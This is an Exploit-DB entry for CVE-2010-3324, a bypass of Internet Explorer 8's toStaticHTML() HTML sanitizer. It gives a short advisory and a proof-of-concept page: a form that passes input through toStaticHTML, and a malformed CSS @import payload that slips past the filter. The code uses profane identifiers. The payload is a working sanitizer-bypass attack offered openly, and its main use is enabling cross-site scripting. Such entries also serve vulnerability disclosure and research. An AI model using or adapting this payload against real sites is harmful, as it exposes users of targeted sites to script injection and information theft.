Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass

EDB-ID:

34478

CVE:

2010-3324

EDB Verified:

Author:

Mario Heiderich

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2010-08-16

Vulnerable App: 
source: https://www.securityfocus.com/bid/42467/info

Internet Explorer 8 is prone to a security-bypass weakness.

Internet Explorer 8 includes a method designed to sanitize executable script constructs from HTML. Attackers can bypass this protection, allowing script code to execute on the client, for example in a 'postMessage' call.

Attackers can leverage this issue to obtain sensitive information or potentially launch cross-site scripting attacks on unsuspecting users of targeted sites. Other attacks may also be possible. 

<script type="text/javascript">
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);

ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
</script>

<form name="shit">
<textarea name=&#039;input&#039; cols=40 rows=20>
&lt;/textarea&gt;
<textarea name=&#039;output&#039; cols=40 rows=20>
&lt;/textarea&gt;

<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
</form>


<style>

} () import <%7D () import> url(&#039;//127.0.0.1/1.css&#039;);aaa

{;}

</style>

<div id="x">Fuck Ie</div>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services